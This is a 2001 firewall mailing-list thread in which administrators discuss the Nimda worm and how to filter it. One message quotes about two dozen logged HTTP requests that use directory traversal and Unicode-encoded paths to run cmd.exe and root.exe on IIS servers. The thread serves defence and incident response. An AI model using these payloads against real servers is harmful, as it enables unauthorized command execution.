I know that this fix isn't done on the firewalls, (and I don't' normally
advocate routers pretending to be firewalls...) but Cisco IOS 12.1(5)T
can do policy based routing that can help....
For those with Cisco routers, you can go to
http://www.cisco.com/warp/public/63/nimda.shtml
HTH
Steve Schuster
Midwest ISO
Security Analyst
-----Original Message-----
From: Joe Pampel [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 12:44 PM
To: [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: Re: [FW1] New worm on the road?
That's the NIMBA worm.. I've been trying various resource filters but no
luck yet. Had well over 3 million log entries so far *today*.. an avg
month for us is ~30,000. (I'm stopping it with a more blunt filter for
now..)
If I get a good rule working I'll post it up, and hope others will do
the same.
Regards from NYC,
Joe
>>> "Patrick Coomans" <[EMAIL PROTECTED]> 09/18/01 05:35PM >>>
Since this evening I am experiencing massive attacks on HTTP (IIS
oriented I presume) from many different IP addresses.
They all look like:
GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn
t/system32/cmd.exe?/c+dir HTTP/1.0
GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn
t/system32/cmd.exe?/c+dir HTTP/1.0
GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn
t/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Is anyone aware that this is some new kind of worm?
Now my FW1 question: can I create a HTTP resource (secure server) that
blocks all requests that e.g. have a .EXE in it ? Or would that slow my
FW1's down to much?
Any other suggestions for good products that can do HTTP content
inspection and that cooperate or can co-exist with fw1 ?
Thanks,
Patrick
========================================================================
========
To unsubscribe from this mailing list, please see the instructions
at
http://www.checkpoint.com/services/mailing.html
========================================================================
========
================================================================================
To unsubscribe from this mailing list, please see the instructions at
http://www.checkpoint.com/services/mailing.html
================================================================================
